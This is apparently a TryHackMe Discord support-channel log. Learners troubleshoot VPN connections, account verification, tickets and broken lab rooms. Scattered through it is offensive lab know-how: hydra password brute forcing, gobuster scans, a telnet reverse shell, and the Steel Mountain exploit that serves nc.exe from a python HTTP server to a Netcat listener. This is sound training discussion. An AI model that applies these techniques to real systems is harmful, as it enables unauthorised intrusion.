#site-support

I guess screenshot could be useful for what are you facing 😄

https://ibb.co/10zhZNJ

Instead of posting a shorteneded (and somewhat sketchy looking anonmyized link) you can verify your THM account and post a screenshot

!docs verify

Ok one sec

I'm kind of getting frustrated

This is the response from the bot TryHackMe
BOT
— Today at 9:51 AM
I'm sorry but I couldn't find the specified token!

Should I post my discord token on here?

Wow the Active Machine Information just popped up

No, you want to put the token from your THM profile in the DM to the bot

@deep spire I'm not slow man I did that already

I'm not saying you are... Tends to work though... Were you missing any characters?

Sorry man just a little frustrated, I'm literally copy/pasting directly from my profile

Lol I must be slow cause I put the <> arrows

There we go 🙂

aaah 😄

'😂

Take care guys, starting work.

Is it common for machines to be rendered offline by a gobuster scan?

I've thrown the directory-list-2.3-medium.txt wordlist at it (220k lines), seems to dislike responding after the first 40k

how many threads are you running? sometimes rooms/vm's can lock up with requests

Just using the default 10 threads

Oh strange, it seems to be resuming

u don't find the directory u are looking for yet?

i don't think any room requires u to brute force that many directories

I'm not too familiar with the difference between the lists, given that I've had a room go beyond 55k on rockyou.txt so I didn't think it would be unreasonable

The lists are different sizes, I wouldn't throw rock you at everything.

most of them just have simple name for directory and if there is any hidden directory, it should be included in the hidden file somewhere that u can find

And have different uses

install secLists and have a nosey at each different list.

Well of course, not going to use a directory wordlist for passwords

And extensions.

I;ve just been defaulting to the lists in the kali attackbox for now

So why are you using rockyou?

i can't decide what list to use with seclist

I'm not

just example for other room i think

Just a heads up, the kali THM machine might be outdated or have issues. I think it's in the process of being updated, but the Attackbox is generally a better shout and kept up to date

Guess I'll pivot over onto it, I remember getting frustrated trying to switch accounts to get msfdb running on the attackbox image

I'm not saying that's definitely the issue in this case, but may be a contributing factor (or may not). More to save you pain in future 🙂

I was gonna guess connectivity issues, but if you're using a THM machine in the cloud, that shouldn't be an issue

So it must have been at the tail end of the list, but gobuster matched a directory after 22 mins
....which was previously known from the smb scanning earlier

this is from the network services room

exploting ftp

ok

why cant i upload pics

u need to verify first

!docs verify

Am i doing something wrong ?

because i cant get the password with hydra

Capital P not lowercase on -p?

i swear to god case sensitivity in options is driving me insane

one more thing

after downloading the file from an ftp server

where can i find it

same thing from telnet aswell

and when doing the telnet one were we had to create a reverse shell

why did we use .RUN before the ping command

.RUN is to execute a command, telnet doesn’t know normal Linux commands, you have to state that it needs to be executed as a Linux command

When you download files it should be in the directory that you typed the command in unless stated otherwise

Hi

Is there any possible way to change the username?

Yes, E-mail support politely and they'll do it no problem.

You'll just need to download a new VPN config.

!email

Thank you 👍

Gave +1 Rep to @weary spindle

how do i state a diffrent path

i'm assuming just typing the path after the command right ?

the ip address given in https://tryhackme.com/room/vulnversity will not open in webpage i cannot complete the room

also how do i unable shared clipboard between the attack box and my machine

It's not a bug,

Did you get it?

still won't load

Did you nmap the machine?

yes

i used port 3333 as well

that was what the web server is running on

What's your target ip?

10.10.157.78

Works for me.

maybe its something with my own network or device... but i never had this problem before

how many tun* you got?

ip a

confused

type ip a on your terminal.

Don't always presume they're on Linux 😉

i got it figured out now i had to manually type http:// to connect to it. Thank you for helping tho

Gave +1 Rep to @weary spindle

Nah, that's true.

whenever i use the -p- tag nmap takes forver

like yesterday it was stuck on starting nmap for over an hour

add the -vv flag at least or else you won't get output until the scan is finished..... which will take a long time if you are scanning 65535 ports

shadow would also recommend adding either -T4 or -T5 to speed up the scan

sonic wouldn't approve though

why not??? those help speed up things

hey guys

i just got a strange message from a user from this server

cloudy_0888#0441

@crystal marlin

thanks

Gave +1 Rep to @weary spindle

-ban 1004545467876638730 Carding scam

🔨 Banned cloudy_0888#0441 indefinitely

Thanks for reporting guys

you can also press v or V to alter the verbosity while the scan is running

true

hi

am confused i did the whole burp room

also all the rooms to get the pentesting badge

but it's not showing up as done in the path?

yes

what should i do 2 fix it

There's a redirect from an old room. You can't currently complete it. It's a known issue that we're looking at

and that marks user number 30+ something with the same problem and question

alright thanks

also i don't have access to some rooms it shows user made this private sth like tat

Yup, that sounds like a room has been made private

Are there any other common things like that?

the room: https://tryhackme.com/room/xssgi task 8 having problems with using the vpn connection and instead kinda requiring the attackbox used to be another one

Added this 54 minutes ago 😎

can't find the room it was in but that one where you are trying to go past a firewall with nmap and it states a detection number also did not work over vpn but works form attackbox and caused some confusion @deep spire

found it: https://tryhackme.com/room/netsecchallenge task 2 last question

seems someone put it into the hint there too

Ah nice, not guilty, so it might have been the room creator?

@deep spire another one that comes up commonly: https://tryhackme.com/room/postexploit task 3... kinda broken because the attackbox version of bloodhound is to new compared to the sharphound instance on the target machine causing problems... last version of bloodhound that works with the target machine version is 3.0.5

Yup, well aware of that one, we're discussing what to do with the room, it may be replaced.

that are all the common problems shadow sees except for the semi rare instance when someone finds a link to a private room

which then tends to quickly get report in #room-bugs and the link gets removed

heya i need to talk to a mod

What's up? Not a mod, but can pass it on?

Hello
What could be the reason that I am not able to connect to a machine with ssh using kali linux with windows wsl
I use openvpn from linux, have no vpn on my windows host
I am able to ping the machine
And I know I have to connect on port 2222

is this WSL or WSL 2? WSL2 is slightly better, but I still wouldn't use WSL if i could absolutely help it.

(I am sometimes able to connect, sometimes not)

oh... Run ip a, sounds like you might have multiple VPN tunnels running

!vpnscript

good old helpful script for the win

That too

It is wsl2

Oh that's totally possible
I tried to connect with openvpn on my windows host
Then On linux

aaaah, if you connect using the same profile in multiple palces the connections fight and disconnect each other. Only run it in the WSL or VM, not the windows/host OS. (otherwise you defo won't get reverse shells, and other things may break)

I see...
Is there a way to disconnect from everywhere and do the whole process again to have a clean connection ?

After using the script it seems working !
Thank you !

I don't know what it is but apparently this was the problem

max transfer unit

If you have multiple you just have to go round and kill them

But if that sorts it, then good stuff

Okay
Yep, I hope it will stay like that 🙂

guys how to enable bi-directional clipboard between my local pc and attack box

there is a grey collapsable box on either the left or right side of the attack box

there are some buttons in there that allow you to copy / paste

youre looking for this:

found it , thanks

am i doing something wrong

this is from network service 2

the script itself is broken right ?

also why do we have to use ./ before the script

u really need to learn some basic linux stuff first then, but ./ is to execute script or file that is executable

where did u get that bash file? why does it have html tag?

from the link in the room

yeah i probably need to brush up on linux a bit haven't used it in a while

might need to check that bash file again

If you have the html link, you haven't downloaded the bash file properly, you have downloaded the webpage.

Already have this module but python2 cant not get it. How to solve this?

Tried with pip3 also not working.

Is that by any chance in task 4? Because i did add something to explain this problem yesterday.

I thought i fixed this... We'll see

Fantastic man! you are great.. I was just thinking it was python2 vs python3 conflicting issues and ya it is.. Thank you😍😍

Gave +1 Rep to @gray loom

Try Hack me bot give error on verify time @torn citrus @zealous yoke @placid mango @fallen juniper

Tech support team....I am unable to upload screenshots on THM discord....is there anything that i need to change

I think that the room https://tryhackme.com/room/phishingyl is broken regarding task 5 (Using GoPhish)

I can login to the gophish page using the link (https://<machine-ip>.p.thmlabs.com:8443/campaigns

But when I am logged in then all the important gophish pages show just a loading icon and I get console errors when trying to create campaigns, sending profiles, etc.

@keen ether this is the fix for your vpn issue #site-support message

did not get this

yes yes yess its worked! thanks again i love you

Gave +1 Rep to @deep spire

@keen ether I'd recommend reading #rules , please don't send Friend requests without asking first.

hey anyone can help me to verify my account with thm bot

it's gave me this error " Sorry, you already have a token on this account. "

@torn citrus @zealous yoke @placid mango @crystal marlin @tawdry orbit @sharp bison

Please don't ping staff, they won't fix it as it's Discord.

You'll need a mod. 🙂

ok 🙂

Im currently having an issue with the sysinternals room (https://tryhackme.com/room/btsysinternalssg). Task 3 asks for you to change the advanced sharing setting so that network discovery is turned on. However I have been unable to enable this feature. I am currently running it via a remote desktop on my Kali machine using Remmina

I guess you good now, right ?

no

pls can you remove my old discord token form bot and then verify my new token @crystal marlin

Hello guys

Why i cant see screeshots in the learning paths?

Send me a DM with your old and new token pls

ohk

i see this ....is it something that needs to be addressed.

Thanks a lot man

Gave +1 Rep to @gray loom

I believe one of them is part of an experiment 🙂

hey guys how secure is reddit

Hey, this channel is for tech-support related to THM. Also, I've got no idea what you mean by this. Are you asking if the servers a re secure, or if it's safe to create an account? Either way, we're unlikely to be able to answer that.

ohhk sorry

where can i mesg btw

what is meant was can government or isp find my ip y crucial information

Possibly #infosec-general ? And governments can ask ISP's for your details using a warrant.

where can I see my active machines? says I can't start a machine since 3 are already started

https://tryhackme.com/api/vm/running

Thanks

Hey, Im in East US and when im trying to use the US-EAST-Regular VPN file I am receiving this error..I default to using the US-WEST-VIP-1 connection but the US-West-VIP VPN server is practically unusable for me

from network services 2

Hey there,
is it possible to reset a learning path which i have already done or do I need to reset every room one by one?

Hello, can anyone help me? Im trying to Start a Machine, but i says me that i am already running 3 machines, how do i kill those machines?

#site-support message

is it posible to not kill the attack box?

No, you need this link

#site-support message

If you go to the rooms you have vm's running in, then yes. Using that command, no, unless you manually alter it.

ok but why

ok i feel so stupid

i was using the wrong machine

lmao

Heh, it happens 😄

Hello guys, hope you are doing well. I get a ticket in a room as a free user, but when i took the subscription i can't get the other ticket. How to solve this ?

#1017019049181450291 message

thank you !

Gave +1 Rep to @deep spire

i refreshed and lost my ticket claim

finished a module and refreshed the page, is there another way to get the notification back?

if you are talking about, that you completed a room and refreshed page and the ticket claiming pop up was gone,
you can reset the room and finish it again

ok, ill try thaty

its worked for me multiple times 😉

cool, it worked, thanks +rep @serene fable

Gave +1 Rep to @serene fable

If I need answers for one of the rooms how to get it?

generally by asking in #room-hints or #room-help (stick to one or the other), and wait until someone is along to help you. It's best to give the room link, say what task and question you're stuck on, what you've tried, and what's gone wrong.

I got the The OSEP "Voucher And I can't redeem it!!!!

@deep spire

I think Robert went to bed a while ago, so please wait for a bit 🙏

Okay Any help from any of the Staff?!!

actually @storm vigil I got this from the FAQ just now:

Most of the prizes you can claim automatically. However, email us at hello+tickets3@tryhackme.com if you've won the OSEP Voucher, HAK5 Rubber Ducky, or HAK5 WiFi Pineapple. Make sure to include your TryHackMe username in the email, and use the prize name in the email title (for example, if you win a Rubber Ducky, include "Rubber Ducky" in the email title). As some of the larger prizes and entries are manual, we will get back to you by early October to verify.```

so you have to email hello+tickets3@tryhackme.com to get it sorted 🙂

congratulations btw 😉

for more FAQ, check out Task 6 https://tryhackme.com/room/tickets3

Thank you ♥️

np, enjoy!

i got my thm token already used because i changed my discord account can i get it back please my account is Tetsu.Calamty

@flint bluff @zealous dune @wispy chasm

https://tryhackme.com/room/vulnversity target ip not loading in my browser what do i do i cant complete this room

Can you DM me from the original discord account?

i think i can i will try

i need help

Does anyone know how to fix a course specific machine thats not loading up?

with my sub

I need help with a question, can someone help me?

Please do not spam the same message across multiple channels.

email support@tryhackme.com for problems with your subscription

Did you nmap it?

my OpenVPN is not getting connection.Why?

Its better if you post a screenshot.

heyo, i just had an odd popup on completion of the phishing room, it said "Error: tickets for this room have already been awarded", I definitely haven't done the room before, is this referring to a limited global pool of tickets or is it just a bug? not too concerned either way, just thought i'd let you know 🙂

Congrats, I see Dolphin pointed you to the right thing, fingers crossed your email goes in before anyone else! I don't think you find out until the end of the event

Hey, I'm doing the network services room.
It says there should only be 3 ports open and 2 of them should be running the smb service but when I perform a scan I find 9 ports are open and none are running smb

You sure you are scanning the right machine?
So the target machine and not the attackbox?

that's it, sorry

thank you

Hello, got a problem with Red Team OPSEC Room Task 2 - critical information identification

how am i supposed to go through when there is no reaction to what I mark?

is there a submit button missing or something?

I have already tried firefox and chrome

Tick the correct 3 things based on the list in task 2 and you'll get the flag pop up

Oh well, my bad. Was too focused on "however, there is no reason to expose your OS".

@crystal marlin I cant make a screenshot on the dev tools

Uhm, why would that be ?

Question: Why after completing rooms (phishing, password attacks, enumeration) i didn't receive any tickets? After I completed these rooms today I wanted to get new tickets and when I clicked on them I received a message "Tickets for this room already awarded", even though it was my first time doing these rooms. Am I misunderstood something about ongoing event?

I dont know but it is a problem

I mean, it shouldn't matter if you have the dev tools open or not to make a screenshot, so I don't understand where the issue is.
Maybe google how to make screenshots with the operating system you are using

Hukey i'll try

But where isthe problem if i make a photo for you of the dev console?

I mean, it's not a big problem, but it's very unpleasant to look at compared to an actual screenshot.
And being able to make a screenshot shouldn't be a very difficult task tbh 😄

But if you are having such a hard time with figuring out how to make a screenshot, then just send a photo 😄

okay

Not sure if this belongs here however, I do not know where eles to post it: I completed the PenTester Tools Series and did not receive the badge, would someone be able to look into this for me?

Mh, not sure why it would give you that status code.
Are you using any personal VPN, if so, could you turn that off and check the errors again?

NO i only use the openVPN configured by the tryhackme

Ok, well not sure why you would get that status code.
It's basically saying you are making too many requests in a short period of time.
Maybe someone else knows how to fix that

like who?

Like any other member of this discord who might have encountered that issues and knows how to fix it, since I don't unfortunately

Hukey thank you

Gave +1 Rep to @crystal marlin

if I buy the wrong plan when I renew my vip, can I cancel the purchase?

What do you mean?

I made the purchase of the annual plan by mistake but I wanted the monthly plan, is there any option to cancel the purchase on the TryHackMe website?

!email

Only support can answer this question.

thanks

you need 3 ticket for the wifi pineapple and the ducky or two ? ???

hey, i am trying to run armitage on my vm, but when i try to run the msfdb init command i get the following:
SCRAM authentication requires libpq version 10 or above
I've googled the whole day and couldnt find anything to fix this, i saw some articles about changing the password but i believe that resulted me in the error messages saying that the user msf cant connect to the database.
Any ideas?

Hey, I got the new Red Teamer title, but I noticed that it doesn't show up when you use "Get Profile Badge ID"

is this something that will be fixed later or will it stay like this?

Yes, you need three

It seems it's giving you the Lucky role from an old promotion

I don't think it ever left?

I’m trying to buy THM but the sales person has stopped responding and his telephone number has stopped working

A subscription? The options on the website are generally the only options

No corporate for 30 users

Ah, can you DM me who you were talking to?

Hi, gotta problem with room "Red Team Opsec", Task 7: None combinations work to get the flag. Can anyone help me out?

You know you are already given the first 2 numbers, right ?

Looks like they just confirmed they managed it in #red-teaming-path . I might add something to say Enter does not work to submit.

Alrighty 🙂 But I have to admit, that task wasn't that straight forward, at least for me 😄

Yeah, I know. It was even worse when it first released, at least you get given the first 2 numbers now. I believe a re-design to make it drag and drop to match them up is going to happen based on the feedback received. I've also got the number orders stored in a txt currently, just in case

I am doing "Enumerating Active Directory" Task 3

I am using ATTACK Box

I am trying run MMC console but cant find the program, instructions says that its preloaded

Help from anyone please

Hi, we generally use the netwrok rooms for troubleshooting these things 🙂 #enumerating-ad Have you remoted into the THMJMP1 machine?

yes I have RDP into THMJMP1

And what are you having trouble finding?

when search for program MMC but nothing there

As it states in the room, "You can start MMC by using the Windows Start button, searching run, and typing in MMC."

thats what I am doing but the MMC app is not there

you need to run the "Run" app

either search for "Run" like this or do "Windows Key + R"

I was attempting to highlight the "search run" bit, but guess it doesn't show that well

OOhhh.. What apps are we hiding!? 😂 :p

wouldn't you like to know 😉

Ya, I noticed that. Will that be changed to say the correct thing?

I've chucked it in our User feedback channel along with an associated bug. Someone should have a look at it, but given it's my last day i won't be able to follow up 😄

All good. Thank you for the feed back!

Gave +1 Rep to @deep spire

hi im doing the Active Directory Basics, i wanna login with RDP with my pc but it doenst work, anyone knows why?

Are you on the VPN?

^

ye i think i foud the problem

let me check

forgot to turn off my nord vpn 😅

D'oh.

Hi, does someone know if there's a bug on the task 6 / flag13.txt in the https://tryhackme.com/room/windowslocalpersistence room ?

i grab the reverse shell as requested but when i ask for the exe to get the flag i have "Sorry! You are still missing something. No flag for you yet. (5)"

Oh sorry ok it's fine, i used the same reverse shell for previous flag and as it was in the same location it may be a verification for getting the flag. Just renamed it and it was ok

could anyone give a obfuscation principles task 8 proper hints for someone new in red teaming as i am stuck for this task since 6+hrs 😫

hi

I can't start a machine anymore, I have this message
Uh-oh! You can only deploy a maximum of 3 machines at a time.
how can i close the one that are not finished?

https://tryhackme.com/api/vm/running

Use that link to see which machines you have running, then you can go to the rooms and close them.

and if you don't mind killing your attackbox too, there's code in the pinned messages which kills them all

okay I see the three rooms where there is an active machine

in which case you can go to those rooms and terminate them.

Thank you all is right, I will keep the url of the api in favorite

+rep @weary spindle

Gave +1 Rep to @weary spindle

Room: Passive Reconnaissance
"On the AttackBox, open the terminal and run the whois tryhackme.com"
There is no internet access on AttackBox (free user).

Do you have a VM?

I do. I am finishing the room from my local VM. But it's funny that the room is suggesting users to use the AttackBox to perform internet required instructions.

I seen Tim say one day that they can only assure you that everything will work in the attackbox.

Having an issue with Steel Mountain Task 4. I am using Kali booted from USB. I started the HTTP server and Netcat listener, and have run the exploit with python. I show the GET /nc.exe bit on the first run, but when I run the exploit a second time it does not work.
I have tried both the github version of nc.exe and the version that comes with kali
No luck with either

I'm wondering if the room is broken

First of all, there is no need to post the same question in more then 1 channel 🙂

The nc.exe you download from github, how did you download it?

With wget ?

no, manually

wasnt sure if this was a buggy room or not so i posted in both

and I used the nc.exe included with kali in the /usr/share/windows etc.

most people I've seen when researching this have an issue with port 80 due to using attackbox, but that is not the case with me, I'm using a kali liveboot system that has worked for me through the complete beginner path and most of the offensive security path

I'm going back through rooms again to take notes and practice writeups

So you kept port 80 in the exploit script ?

so I know I've done this before

no, exploit I'm using 443

And your nc listener was listening on which port ?

443

And you also terminated the python server before running it the 2nd time ?

no, kept server up

!rank in #bot-commands not working for me

Maybe that's the issue, I would try to terminate the python server after the nc.exe got uploaded (use the one from github, not the one that comes with your kali) and then start up your nc listern, then run the script a 2nd time

Because you are not verified

!docs verify

okay thnx

okay, thanks, starting with new instance of room and trying again

tried that and I'm just getting another "GET /nc.exe HTTP/1.1" 200 -

I have no idea at this point

Maybe verify and show a screenshot of what exactly you get, as I'm unsure what you mean with "another", a 2nd one after the first request ?

!docs verify

how do i upload a screenshot?

im on the web app, only have gif, stickers, and emojis

Follow the link and verify, then you can upload screenshots

/tmp/SteelMountain

/tmp/SteelMountain

still not working

/tmp/SteelMountain

I'm unsure what exactly you are doing

https://help.tryhackme.com/community/discord

ctrl c ctrl v

I tried and got

Your message could not be delivered. This is usually because you don't share a server with the recipient or the recipient is only accepting direct messages from friends. You can see the full list of reasons here: https://support.discord.com/hc/en-us/articles/360060145013

/tmp/SteelMountain

You have to allow DMs of server members for the TryHackMe discord in the privacy settings

its enabled

But in the settings for that specific server, not just in the general settings

Next to the server name there is a drop down menu

yeah i clicked on tryhackme and then enabled it

Alright, then you should be able to DM the bot now

same thing

didnt work

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.112.132 - - [09/Sep/2022 14:26:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.112.132 - - [09/Sep/2022 14:26:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.112.132 - - [09/Sep/2022 14:26:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.112.132 - - [09/Sep/2022 14:26:44] "GET /nc.exe HTTP/1.1" 200 -

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.112.132 - - [09/Sep/2022 14:26:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.112.132 - - [09/Sep/2022 14:26:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.112.132 - - [09/Sep/2022 14:26:44] "GET /nc.exe HTTP/1.1" 200 -
10.10.112.132 - - [09/Sep/2022 14:26:44] "GET /nc.exe HTTP/1.1" 200 -

thats what it shows

since it wont let me screenshot

*send screenshot

does that make any sense?

Well not sure why you would get the request 4 times

Also, you could try a different port for your listener in the script

I only did the exploit once

Like 4455 or something

i tried 443,445,446,4444,4445

ill try 4455

If you do sudo ufw status what's the reply you get ?

sudo: ufw: command not found

Okay, well beside your nc.exe being faulty, I'm not sure what the issue could be

how does ufw status effect it?

is that something I need

ufw == uncomplicated firewall

firewalls can affect network connection thingies

I would double check it, if there are html elements at the top of your nc.exe then it's faulty

okay, I'm going to report this to THM support

I appreciate your help

I doubt it's an issue with the machine

this has been super frustrating, but not the first bug I've had to work through for THM rooms

and the lack of screenshots makes it harder

yeah, Discord doesnt make screenshots easy

still getting the error message when I try to !verify

oh, lol, just tried again and it worked

they must be listening to us

here it is

nevermind, forgot to add the .png

so here it is

can you open another terminal in that folder with nc.exe

and then run file nc.exe

on the kali vm

not on the target

nc.exe: PE32 executable (console) Intel 80386, for MS Windows

thats what I got

okay then it is at least not html code thingy stuff that fontaene suspected

yeah, what do you think the likelihood its a bug on THM end?

¯_(ツ)_/¯

!vpnscript

I've had it happen before, where you have to use workaraound, such as different payloads for metasploit

have you tried this just to rule out any cause from bad connection

instead of the ones they suggest

Actually, since you are getting multiple requests at the same time, you could have multi vpn

If you do ip a s do you only see a tun0 interface or any extra like tun1, tun2 etc

which is part of the reasoning asking for the vpn trouble shoot script to be run

no, just tun0

Any personal VPN running on your host machine ?
I assume your kali is a VM ?

no kali running as a live persistent USB

ah

never had problems with vpn before

just having to restart rooms, which I've done countless times

I won't take up anymore of your time, I'm going to put this in THM Staff's court since it seems to be an issue with the room right now. How is their response time for support?

I'm assuming on a friday afternoon I probably wont hear anything until Monday?

That could vary pretty widely, especially when there is an event going on

If you think something is a bug, it's best to put it in #room-bugs
If I wouldn't be ill actually, I would try the room myself now, depending how I feel tomorrow I might can do that

In case you don't get it solved meanwhile or someone else is able to help you

yeah shadow thought about opening the room themselves and trying too but doing that at 00:17 feels weird

Looks fine

okay then

well thanks again for the help y'all

and for walking me through this discord thing, I feel like an old man

😆

If you guys try the room please DM me!

I appreciate it

Goodbye!

👋

Hey i know this is probably a common issue but I cannot for the life of me fix it, whenever i try to connect I fail, ive used the troubleshoot script and what find is that tun0 interface does not exist and when it tries to connect automatically it "is taking longer than expected to complete" before failing to connect

you using linux or windows ? and are you facing difficulty in connecting to vpn ?

linux, and yes im facing difficulties connecting

it doesnt connect, its a failed TLS handshake with the troubleshoot script saying tun0 does not exist

can you share a screenshot, as per my understanding, Openvpn is not connecting

i cant send one rightthis second youl have to give me like

3 minutes

i dont have discord downloaded on my laptop im on a desktop right now that is shared

ok, have you used the command sudo openvpn Sable.ovpn ?

yep

word for word this is the error messages
///

oops bad keyboiard let me get american

TLS Error: TLS key negotiation faild to occur within 60 seconds (check your network connectivity)
TLS Error: TLS handshake failed

oh i also cant attach screenshots anyways

https://ibb.co/R4jLH6v

thats an image of it

lets wait for some admin to guide you through it

To send images here, you have to verify yourself with your THM account token

!docs verify

Which country are you in?

what should i do if google isnt in my search engine list?

I'm a bit unsure what exactly you mean with that.
But if it's not related to TryHackMe please use #infosec-general or #general for such questions

Hey, why suddenly openvpn connection doesn't work anymore 😦

It used to be working fine, by adding data-ciphers in ovpn config

2022-09-10 15:59:47 DEPRECATED OPTION: --cipher set to 'AES-256-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-256-CBC' to --data-ciphers or change --cipher 'AES-256-CBC' to --data-ciphers-fallback 'AES-256-CBC' to silence this warning.
2022-09-10 15:59:47 OpenVPN 2.5.1 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on May 14 2021
2022-09-10 15:59:47 library versions: OpenSSL 1.1.1n  15 Mar 2022, LZO 2.10
2022-09-10 15:59:47 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-10 15:59:47 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-10 15:59:47 TCP/UDP: Preserving recently used remote address: [AF_INET]54.193.147.96:1194
2022-09-10 15:59:47 Socket Buffers: R=[212992->212992] S=[212992->212992]
2022-09-10 15:59:47 UDP link local: (not bound)
2022-09-10 15:59:47 UDP link remote: [AF_INET]54.193.147.96:1194

after adding data-ciphers in config:

2022-09-10 16:01:27 --cipher is not set. Previous OpenVPN version defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2022-09-10 16:01:27 OpenVPN 2.5.1 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on May 14 2021
2022-09-10 16:01:27 library versions: OpenSSL 1.1.1n  15 Mar 2022, LZO 2.10
2022-09-10 16:01:27 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-10 16:01:27 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-10 16:01:27 TCP/UDP: Preserving recently used remote address: [AF_INET]54.193.147.96:1194
2022-09-10 16:01:27 Socket Buffers: R=[212992->212992] S=[212992->212992]
2022-09-10 16:01:27 UDP link local: (not bound)
2022-09-10 16:01:27 UDP link remote: [AF_INET]54.193.147.96:1194

Help i can't not connect VPN tryhackme EU-1-2 VIP and Us-VIP

Looks like cipher issue: #site-support message

hi, I wrote two email, one concerning tickets earned by inviting friends (hello+tickets3@tryhackme.com) and the other to ask some information about a prize I won (hello@tryhackme.com), but I haven't received a reply yet (I've been waiting for 2/3 days). Is that normal?

Thank you

Gave +1 Rep to @crystal marlin

why is openvpn so broken on windows

Try using non vip gateways. Helped me yesterday.

In room https://tryhackme.com/room/lateralmovementandpivoting I cannot reach the DC neither through VPN nor directly from the attack box.

Could someone please have a look at this?

Thanks 🙂

i dont have a student email how can i prove i am a student?

Do you have any documentation from your campus you're a student?

yes

Then you can use that when you E-mail support.

hmm

but theres my whole info

I'm sure Jabba wouldn't ask got anything that would dox you.

wait

i have email

but i dont think they would recognize it

ill try

Try the E-mail first. 🙂

oh wow

they did

i am always asking dumb questions to you excuse me

No such thing as dumb questions friend.

Same, I can't connect to US-VIP too

It happened in the middle of win privesc room

thank you

Gave +1 Rep to @weary spindle

strangely it is working on openvpn 2.5.7, but not in 2.5.1

Changing server to EU-vip solve the problem

i had done 3 rooms and got 1 ticket each how can i get the other one

Are you a free user?

i subbed one hour ago

Did you do the rooms before or after the sub?

before

That's why.

I don't think you can repeat the rooms and get the additional ticket for being a sub.

oh

You need to verify.

!docs verify

Follow the link.

Does that room have a webserver at port 80?

Network has been resetted. All resources are reachable again. Issue is solved.

Hello, I'm stuck

Question:
What is Elliot’s way of hiding his secret data?

Link:https://hubchallenges.s3.eu-west-1.amazonaws.com/foren/elliot_secrets.bin

Pls help me

is there a way to get kali linux on vmware on an m2 macbook?

America

tryhackme have Room linux buffer overflow ?

whats this

You got the red teamer role.

"Pentester" hasn't been changed in the THM bot.

ah ok

This room is more aimed at THM content.

You could try #general

are you a mod or sth on thm?

Nope.

lol

you are always answering questioins

and helping

I like to be helpful.

you do more than some mods i think

No, that's not true. 🙂

not sure about that

Sometimes also, the advice I give out, isn't the right advice.

I just said they go to General as they will get an answer faster.

but how is over the half claimed in 1 day

Oh, lot's of people.

did you already get anything?

🙂 I'm just waiting for the E-mail to confirm if I have won,

However I claimed in the first few hours of release, so that's hopeful too.

won what?

https://tryhackme.com/p/ScrubZ

Check my tickets 😄

oh the hak5pineapple

whats that even

https://shop.hak5.org/products/wifi-pineapple

i hope you win

you deserve it

Thank you 😄

Gave +1 Rep to @hushed vigil

yoo my first rep

Really? 😄

i think so

okay thanks

Gave +1 Rep to @weary spindle

How do I kill all running machines?

#site-support message

legend, ty

hello there, i've installed openVPN and i set it up with the configuration file but now i dont know how to proceed to actually use it as an attack box/virtual machine to complete tasks

any help would be awesome 🙂

https://www.youtube.com/watch?v=l97dVIKlmVg

follow along

then download the vpn file into that virtual box virtual machine and install the openvpn thingy using apt and then run it using sudo openvpn /path/to/.ovpn

an ubuntu virtual machine works too ?

yes but that needs a lot more installing of packets and tools that you might not know how to install if you are not familiar with linux

well how familiar are we talking about

i mean i can use the terminal and stuff

kali is much more oriented hacking that's why its easier here right?

yuups.... it comes with nearly all the tools you need for hacking stuffs

oh okay

well ty very much for ur help 😁

no problem

Hey, this chat is more for site tech-support. If you’re completing a room that requires the tool, checkout #room-help else #infosec-general

how do i claim the 20% student discount?

Do you have a student E-mail?

!docs student

Oh thanks,

Hi guys, im doing the windows privesc room by tibs. But my rdp session keeps going down on my kali. could anyone assist?

I can't join the voicechat for tryhackme, but I can join voicechats on other channels. My phone number is verified. Clicking on a voice chat channel on the tryhackme discord just doesn't do anything. Any ideas?

It says my token is used by another profile. How do I get my tryhackme account attached to this Discord?

How do I post a photo into discord?

I tried asking one but the message was undeliverable, who do I ask?

@gray loom

Thanks! @gray loom

Gave +1 Rep to @gray loom

Do you still have access to the old account?

No

The tryhackme website account I do

Message me (hydragyrum) with the thm messaging system

ok

@stray cove how do I do that?

@How do I use the THM messaging system on the website?

Hi, i can't DM the bot :(

@stray cove your name is not coming up in the recipient options

Same name as this one but with a lowercase

Allow private messages from server members in the privacy settings for this server

Oh yea, thx !

Gave +1 Rep to @crystal marlin

I can't get any usernames to pop up in the recipient search bar

I got @crystal marlin name to pop up in the search bar, but I can't send a message nonethelesss

@gray loom @stray cove

Would love to post a screenshot but...

@stray cove does not come up upper case or lower. Does not send even if I put a name in it recognizes, like Fontaene

Please be patient, there is no need to ping all 3 of us.
Regardless of the ping, Hydra is already taking care of you, so wait for their reply 🙂

Hmm that's odd, what's your username?

TotalNormie @stray cove

Tried with google chrome and firefox @stray cove

Thanks @bronze vale, will do

Gave +1 Rep to @bronze vale

Since Hydragyrum has moved on, can I ask you to help me @crystal marlin ?

I pinged you on THM

Hello, not sure where to out this but I believe there is a potential bot user

987912954680860764

Here is their id

The message was a phishing credit card message, saying I could get “hacked”credit cards

Enyluap#0104 is the user that sent me the messages

@stray cove

I can send/post images as well

of the message

DM me a screenshot pls

Yes

-ban 987912954680860764 Carding Scam

🔨 Banned Enyluap#0104 indefinitely

Thanks for reporting

No problem, thank you for the help

Btw is this the proper channel to post this kinda stuff?

Should be fine here yes

👍

Hello. I'm unable to access this room Learn Linux and here's the link https://tryhackme.com/room/zthlinux. It says "If this is an error on our behalf. Please contact us." Can anyone be able to help me in this case?

Guys i am unable to see the learning paths it takes me here https://tryhackme.com/paths and this does not load anything.

yes tried different browsers

